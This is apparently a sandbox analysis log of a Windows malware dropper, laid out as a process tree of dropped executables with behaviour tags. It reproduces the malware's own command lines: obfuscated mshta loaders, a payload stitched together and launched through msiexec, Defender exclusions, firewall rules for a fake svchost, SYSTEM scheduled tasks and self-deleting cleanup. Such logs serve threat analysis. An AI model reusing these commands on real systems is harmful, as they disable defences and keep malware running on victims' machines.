C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe"C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe"3⤵
- Executes dropped EXE
PID:4580
-
-
-
C:\Users\Admin\Pictures\Adobe Films\e6WeCqUpNWJV6aPgszJeX9E0.exe"C:\Users\Admin\Pictures\Adobe Films\e6WeCqUpNWJV6aPgszJeX9E0.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2520 -
C:\Users\Admin\Documents\6gLgVHK4S6fRDlTOaK71bGb9.exe"C:\Users\Admin\Documents\6gLgVHK4S6fRDlTOaK71bGb9.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4012 -
C:\Users\Admin\Pictures\Adobe Films\MS7ss0t3Z_BgNm5vQL0FhEFR.exe"C:\Users\Admin\Pictures\Adobe Films\MS7ss0t3Z_BgNm5vQL0FhEFR.exe"4⤵
- Executes dropped EXE
PID:1480
-
-
C:\Users\Admin\Pictures\Adobe Films\r8MBUoHvcWqO6aNLC5f23A0S.exe"C:\Users\Admin\Pictures\Adobe Films\r8MBUoHvcWqO6aNLC5f23A0S.exe"4⤵
- Executes dropped EXE
PID:5156
-
-
C:\Users\Admin\Pictures\Adobe Films\zObJUR9EVjyfYx_qv35UyzNe.exe"C:\Users\Admin\Pictures\Adobe Films\zObJUR9EVjyfYx_qv35UyzNe.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5124
-
-
C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3740 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵
- Checks whether UAC is enabled
PID:2212 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\z43qKkeelVhYZeo9SP_z8aeG.exe" ) do taskkill -f -iM "%~NxM"6⤵PID:5432
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3872 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:4744 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:4208
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )8⤵
- Checks whether UAC is enabled
PID:4724 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC9⤵PID:4032
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵PID:5060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵PID:4372
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Loads dropped DLL
PID:6288
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "z43qKkeelVhYZeo9SP_z8aeG.exe"7⤵
- Kills process with taskkill
PID:888
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\vupKshalYTqbBzAgIHkdBXKJ.exe"C:\Users\Admin\Pictures\Adobe Films\vupKshalYTqbBzAgIHkdBXKJ.exe"4⤵PID:3392
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4376 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4660
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:5696
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OOEA7DkxfTRmQavkjfVnrAHD.exe"C:\Users\Admin\Pictures\Adobe Films\OOEA7DkxfTRmQavkjfVnrAHD.exe" /mixtwo4⤵
- Executes dropped EXE
PID:828 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 6525⤵
- Program crash
PID:4152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 6645⤵
- Program crash
PID:5468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 6285⤵
- Program crash
PID:5604
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 6845⤵
- Program crash
PID:5728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 8845⤵
- Program crash
PID:4108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 9325⤵
- Program crash
PID:3756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 11045⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4192
-
-
-
C:\Users\Admin\Pictures\Adobe Films\V4SCYlZHCcOHjngJbi971hMu.exe"C:\Users\Admin\Pictures\Adobe Films\V4SCYlZHCcOHjngJbi971hMu.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6044 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5688 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"6⤵PID:4764
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1fc,0x200,0x204,0x1d8,0x208,0x7ffd78ebdec0,0x7ffd78ebded0,0x7ffd78ebdee07⤵PID:7272
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff7359f9e70,0x7ff7359f9e80,0x7ff7359f9e908⤵PID:7428
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1756,16477206392915712665,5483262561208560081,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4764_1068618917" --mojo-platform-channel-handle=1772 /prefetch:87⤵PID:7940
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\f7VAnYD0ZMCm46C7pv9aNPyZ.exe"C:\Users\Admin\Pictures\Adobe Films\f7VAnYD0ZMCm46C7pv9aNPyZ.exe"4⤵
- Executes dropped EXE
PID:5180 -
C:\Users\Admin\AppData\Local\Temp\is-206C2.tmp\f7VAnYD0ZMCm46C7pv9aNPyZ.tmp"C:\Users\Admin\AppData\Local\Temp\is-206C2.tmp\f7VAnYD0ZMCm46C7pv9aNPyZ.tmp" /SL5="$102B6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\f7VAnYD0ZMCm46C7pv9aNPyZ.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
PID:6124 -
C:\Users\Admin\AppData\Local\Temp\is-UN73N.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-UN73N.tmp\DYbALA.exe" /S /UID=27096⤵PID:5796
-
C:\Program Files\Windows Defender Advanced Threat Protection\BNYIKCYPWG\foldershare.exe"C:\Program Files\Windows Defender Advanced Threat Protection\BNYIKCYPWG\foldershare.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4312
-
-
C:\Users\Admin\AppData\Local\Temp\9f-84861-34c-5eb98-6fa51d5519593\ZHalijicaeshe.exe"C:\Users\Admin\AppData\Local\Temp\9f-84861-34c-5eb98-6fa51d5519593\ZHalijicaeshe.exe"7⤵
- Executes dropped EXE
PID:1268
-
-
C:\Users\Admin\AppData\Local\Temp\c1-5041e-a38-502b5-86535f2727b89\SHumokyhefi.exe"C:\Users\Admin\AppData\Local\Temp\c1-5041e-a38-502b5-86535f2727b89\SHumokyhefi.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5680 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yl1t5p0w.p3k\GcleanerEU.exe /eufive & exit8⤵PID:2696
-
C:\Users\Admin\AppData\Local\Temp\yl1t5p0w.p3k\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\yl1t5p0w.p3k\GcleanerEU.exe /eufive9⤵
- Executes dropped EXE
PID:6544 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 65210⤵
- Program crash
PID:6816
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 67210⤵
- Program crash
PID:1512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 67610⤵
- Program crash
PID:6412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 58810⤵
- Program crash
PID:6928
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exeC:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exe /qn CAMPAIGN="654"9⤵PID:6552
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5ytppeyl.ieu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654211 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵PID:6752
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wy2rscq5.4qt\any.exe & exit8⤵PID:6240
-
C:\Users\Admin\AppData\Local\Temp\wy2rscq5.4qt\any.exeC:\Users\Admin\AppData\Local\Temp\wy2rscq5.4qt\any.exe9⤵PID:7148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qp3loodu.0r1\gcleaner.exe /mixfive & exit8⤵PID:6592
-
C:\Users\Admin\AppData\Local\Temp\qp3loodu.0r1\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\qp3loodu.0r1\gcleaner.exe /mixfive9⤵PID:6956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 65210⤵
- Program crash
PID:1512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 66810⤵
- Program crash
PID:5496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 67210⤵
- Program crash
PID:6148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 66810⤵
- Program crash
PID:2320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 88410⤵
- Program crash
PID:5720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6956 -s 109610⤵
- Program crash
PID:4504
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exe /verysilent & exit8⤵PID:6900
-
C:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exeC:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exe /verysilent9⤵PID:6108
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FastPC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ji42o14q.nte\FastPC.exe" & del C:\ProgramData\*.dll & exit10⤵PID:3524
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FastPC.exe /f11⤵
- Kills process with taskkill
PID:7804
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
PID:8652
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x11xojmt.dca\autosubplayer.exe /S & exit8⤵PID:7048
-
C:\Users\Admin\AppData\Local\Temp\x11xojmt.dca\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\x11xojmt.dca\autosubplayer.exe /S9⤵PID:4408
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9104.tmp\tempfile.ps1"10⤵PID:7668
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:808
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nHvwzSVZB5C_2lNYpayO6xbN.exe"C:\Users\Admin\Pictures\Adobe Films\nHvwzSVZB5C_2lNYpayO6xbN.exe"2⤵
- Executes dropped EXE
PID:1184
-
-
C:\Users\Admin\Pictures\Adobe Films\JFXVqZOn7ssgWpUgV2CUaIij.exe"C:\Users\Admin\Pictures\Adobe Films\JFXVqZOn7ssgWpUgV2CUaIij.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2120
-
-
C:\Users\Admin\Pictures\Adobe Films\OerARSDN8_Y6xtKjAv9ItJbN.exe"C:\Users\Admin\Pictures\Adobe Films\OerARSDN8_Y6xtKjAv9ItJbN.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:2060 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:4824
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
PID:4924
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6OMebL7JbPas8BcXIUNnfFcX.exe"C:\Users\Admin\Pictures\Adobe Films\6OMebL7JbPas8BcXIUNnfFcX.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1228 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 6OMebL7JbPas8BcXIUNnfFcX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\6OMebL7JbPas8BcXIUNnfFcX.exe" & del C:\ProgramData\*.dll & exit3⤵PID:4636
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 6OMebL7JbPas8BcXIUNnfFcX.exe /f4⤵
- Kills process with taskkill
PID:5772
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:4936
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IU5rmCoRAx2aHgjhPh2xdpHv.exe"C:\Users\Admin\Pictures\Adobe Films\IU5rmCoRAx2aHgjhPh2xdpHv.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2184
-
-
C:\Users\Admin\Pictures\Adobe Films\W1bYeEIYUUPaZDtUMFaYTrWG.exe"C:\Users\Admin\Pictures\Adobe Films\W1bYeEIYUUPaZDtUMFaYTrWG.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1892 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:4484
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:5076
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\VEa4XNX37VROBVrK80k5VxkO.exe"C:\Users\Admin\Pictures\Adobe Films\VEa4XNX37VROBVrK80k5VxkO.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im VEa4XNX37VROBVrK80k5VxkO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\VEa4XNX37VROBVrK80k5VxkO.exe" & del C:\ProgramData\*.dll & exit3⤵PID:5060
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im VEa4XNX37VROBVrK80k5VxkO.exe /f4⤵
- Kills process with taskkill
PID:5800
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:1812
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\aj1qRBbUcTuprnRCEvZjOudA.exe"C:\Users\Admin\Pictures\Adobe Films\aj1qRBbUcTuprnRCEvZjOudA.exe"2⤵
- Executes dropped EXE
PID:3724 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 6603⤵
- Program crash
PID:4376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 6963⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 6483⤵
- Program crash
PID:4676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 7123⤵
- Program crash
PID:1048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 11363⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4548
-
-
-
C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe"C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe"C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe"3⤵
- Executes dropped EXE
PID:588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 8764⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1012
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RD8KFq6f5QViwV0MrTou3rpZ.exe"C:\Users\Admin\Pictures\Adobe Films\RD8KFq6f5QViwV0MrTou3rpZ.exe"2⤵
- Executes dropped EXE
PID:1952
-
-
C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe"C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:680 -
C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe"C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe"3⤵
- Executes dropped EXE
PID:4588
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Y7B85KyvjK4STp4RCLBO190o.exe"C:\Users\Admin\Pictures\Adobe Films\Y7B85KyvjK4STp4RCLBO190o.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2732
-
-
C:\Users\Admin\Pictures\Adobe Films\fEbcFuzCW9Be1RqlDsqMbCAi.exe"C:\Users\Admin\Pictures\Adobe Films\fEbcFuzCW9Be1RqlDsqMbCAi.exe"2⤵
- Executes dropped EXE
PID:1632
-
-
C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe"C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe"C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe"3⤵
- Executes dropped EXE
PID:6084
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AecmysbzIXMVq1dRFsqTK8lb.exe"C:\Users\Admin\Pictures\Adobe Films\AecmysbzIXMVq1dRFsqTK8lb.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:3608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵PID:4476
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:4640
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:4660
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
PID:5760
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:6028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵PID:5020
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:5768
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:1916
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exe"C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4200 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1160 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵PID:6540
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x19c,0x1e8,0x7ffd78ebdec0,0x7ffd78ebded0,0x7ffd78ebdee05⤵PID:3192
-
-
